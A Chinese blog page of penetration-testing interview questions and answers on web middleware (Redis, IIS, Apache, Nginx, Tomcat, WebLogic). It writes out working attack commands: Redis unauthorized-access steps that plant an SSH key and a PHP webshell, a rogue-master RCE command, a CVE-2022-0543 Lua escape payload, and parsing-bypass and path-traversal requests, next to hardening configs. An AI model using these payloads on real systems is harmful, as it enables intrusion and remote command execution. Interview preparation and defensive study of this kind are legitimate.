当前位置: 首页 > news >正文

2025年常见渗透测试面试题- 常见中间件(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 常见中间件

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧

2. 新型攻击手法

3. 防御体系构建

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵

2. 高级利用技巧

3. 防御方案

三、Java中间件生态全景

1. 主流容器对比

2. 新兴力量

四、Tomcat安全加固十二律

五、Tomcat持久化机制解密

1. 部署目录行为分析

2. 防御实践

六、中间件安全演进趋势

深度防御建议

 常见中间件

Redis未授权访问漏洞如何入侵利用?

说说常见的中间件解析漏洞利用方式

JAVA有哪些比较常见的中间件容器?

tomcat要做哪些安全加固?

如果tomcat重启的话,webapps下,你删除的后台会不会又回来?

常见的网站服务器中间件容器。

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧
  1. SSH密钥植入

    bashredis-cli -h 10.2.3.4 flushall echo -e "\n\nssh-rsa AAAAB3NzaC1yc... user@kali" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ redis-cli config set dbfilename "authorized_keys" redis-cli save 

    通过修改Redis持久化路径,将公钥写入目标服务器认证文件

  2. Webshell写入
    适用于Web目录已知场景:

    bashredis-cli config set dir /var/www/html/ redis-cli set shell "<?phpsystem($_GET['cmd']);?>" redis-cli config set dbfilename "webshell.php" redis-cli save 
  3. 主从复制RCE
    利用模块化攻击框架:

    bashpython3 redis-rogue-server.py --rhost 10.2.3.4 --lhost 192.168.1.5 

    通过恶意主节点发送module load指令加载.so扩展库实现命令执行

2. 新型攻击手法
  • CVE-2022-0543 Lua沙箱逃逸
    利用Debian补丁漏洞执行任意命令:
    luaeval 'local io = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io(); local f = io.popen("id", "r"); local res = f:read("*a"); return res' 0 
3. 防御体系构建
bash# 修改redis.conf 关键配置 requirepass MyS3cr3tP@ss bind 127.0.0.1 ::1 rename-command FLUSHALL "" protected-mode yes 

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵
中间件漏洞类型利用示例影响版本
IIS 6.0目录解析漏洞/test.asp/test.jpgWindows Server 2003
Apache文件名解析特性shell.php.rar所有版本
Nginx%00截断/test.jpg%00.php<0.8.37
PHP-CGI参数解析漏洞/test.jpg -s 192.168.1.5:4444PHP<5.3.12
Tomcat后缀绕过/shell.jsp%207.x/8.x
2. 高级利用技巧
  1. IIS短文件名爆破
    使用工具扫描暴露的8.3格式短文件名:

    bashiis_shortname_scan.py -u http://target/
  2. Nginx配置错误
    错误配置导致源码泄露:

    nginxlocation /static { alias /var/www/; }

    访问/static../app/config.py 获取敏感文件

  3. WebLogic特殊后缀

    httpGET /ws_utc/begin.do?.css HTTP/1.1 
3. 防御方案
  1. IIS加固
    • 禁用ASP解析功能
    • 配置请求过滤规则
  2. Apache修复
    apache<FilesMatch "\.ph(p[3457]?|t|tml)$"> SetHandler application/x-httpd-php </FilesMatch>

三、Java中间件生态全景

1. 主流容器对比
中间件核心特性常见漏洞
TomcatServlet/JSP容器CVE-2017-12615(PUT上传)
WebLogic企业级J2EE应用服务器CVE-2020-14882(未授权RCE)
Jetty轻量级嵌入式容器CVE-2021-28169(路径遍历)
JBoss/WildFlyJava EE开源实现CVE-2017-12149(反序列化)
WebSphereIBM商业级解决方案CVE-2020-4450(IIOP反序列化)
2. 新兴力量
  • Undertow:Red Hat高性能非阻塞服务器
  • Payara:GlassFish社区分支
  • OpenLiberty:IBM轻量化微服务容器

四、Tomcat安全加固十二律

  1. 权限最小化

    bashuseradd -M -s /sbin/nologin tomcat_user chown -R tomcat_user:tomcat_group /opt/tomcat/
  2. 配置强化

    xml<!-- conf/server.xml --> <Connector port="8080" maxHttpHeaderSize="8192" server="Undisclosed" address="127.0.0.1"/>
  3. 管理界面防护

    xml<!-- conf/tomcat-users.xml --> <role rolename="manager-script"/> <user username="deployer" password="Zxcv@1234!" roles="manager-script"/>
  4. 协议升级

    xml<Connector SSLEnabled="true" sslProtocol="TLS" sslEnabledProtocols="TLSv1.2,TLSv1.3" ciphers="TLS_AES_256_GCM_SHA384,..."/>
  5. 入侵检测配置

    bash# 部署Logstash监控日志 input { file { path => "/opt/tomcat/logs/*.log" start_position => "beginning" } }

五、Tomcat持久化机制解密

1. 部署目录行为分析
  • 热部署机制webapps/目录变更触发自动加载
  • 备份恢复场景
    bash# 典型目录结构 webapps/ ├── ROOT ├── app1.war ├── app1/ └── backup/ └── app1_20240411.bak 
2. 防御实践
  1. 彻底删除流程

    bashrm -rf webapps/app1/ # 删除解压目录 rm webapps/app1.war # 删除部署包 sed -i '/app1/d' conf/Catalina/localhost/*.xml # 清理配置文件 
  2. 防止自动恢复

    xml<!-- conf/context.xml --> <Context antiResourceLocking="true" antiJARLocking="true"> <WatchedResource>WEB-INF/web.xml</WatchedResource> </Context>

六、中间件安全演进趋势

  1. 云原生转型
    • 容器化部署:Kubernetes Operator管理中间件
    • Service Mesh:Istio实现安全流量管控
  2. 智能防护体系
    • AI驱动的WAF:动态识别0day攻击
    • RASP技术:实时阻断内存马注入
  3. 合规驱动
    • 等保2.0三级要求
    • GDPR数据安全规范
  4. 供应链安全
    • SBOM(软件物料清单)管理
    • 镜像签名验证
  5. 零信任架构
    • SPIFFE身份认证
    • 持续动态授权

深度防御建议

  1. 建立中间件资产清单

    csvIP地址,中间件类型,版本号,开放端口,负责人 10.1.2.3,Tomcat,9.0.64,8080,张三 10.1.2.4,WebLogic,12.2.1.4,7001,李四 
  2. 自动化漏洞扫描

    bash# 使用Nexpose执行扫描 nexpose -s 10.1.2.0/24 -t middleware_scan 
  3. 红蓝对抗演练

    mermaidgraph LR A[制定攻击方案] --> B[模拟入侵] B --> C[横向移动] C --> D[获取敏感数据] D --> E[编写防御手册]
  4. 安全左移实践

    bash# 在CI/CD流水线集成安全检查 mvn verify -Dincludes=**/*.jsp -Dcheckstyle.config=security-check.xml 

本体系化解决方案覆盖中间件全生命周期安全管理,建议结合ATT&CK框架构建持续监控能力,通过自动化工具链实现安全能力闭环。

相关文章:

  • 山东大学软件学院项目实训-基于大模型的模拟面试系统-专栏管理部分
  • 代码随想录算法训练营Day27
  • vulkanscenegraph显示倾斜模型(5.9)-vsg中vulkan资源的编译
  • 多模态大语言模型arxiv论文略读(十三)
  • 【使用jenkins+docker自动化部署java项目】
  • MacOs下解决远程终端内容复制并到本地粘贴板
  • Web渗透之文件包含漏洞
  • 分层对象模型:PO、DTO、VO、BO定义区别与使用场景
  • win10中快速访问部分外网的快捷设置方法
  • 【已更新完毕】2025泰迪杯数据挖掘竞赛B题数学建模思路代码文章教学:基于穿戴装备的身体活动监测
  • MySQL中的隐式转换和显式转换
  • 2025认证杯挑战赛B题【 谣言在社交网络上的传播 】原创论文讲解(含完整python代码)
  • java学习总结(if switch for)
  • Go:方法
  • 【Java】查看当前 Java 使用的垃圾回收器
  • 【GitHub探索】mcp-go,MCP协议的Golang-SDK
  • AVL搜索树
  • 互斥锁(mutex) ---- 静态锁与动态锁
  • (C语言)算法复习总结1——二分查找
  • 【T2I】Region-Aware Text-to-Image Generation via Hard Binding and Soft Refinement
  • 习近平出席中国-拉美和加勒比国家共同体论坛第四届部长级会议开幕式
  • 明查|印度空军“又有一架战机被巴基斯坦击落,飞行员被俘”?
  • 董军同法国国防部长举行会谈
  • 第12届警博会在即:一批便民利企装备亮相,规模创历史新高
  • 上海交大计算机学院成立,设多个拔尖人才特色班
  • 体坛联播|穆勒主场完成拜仁谢幕战,山西车队再登环塔拉力赛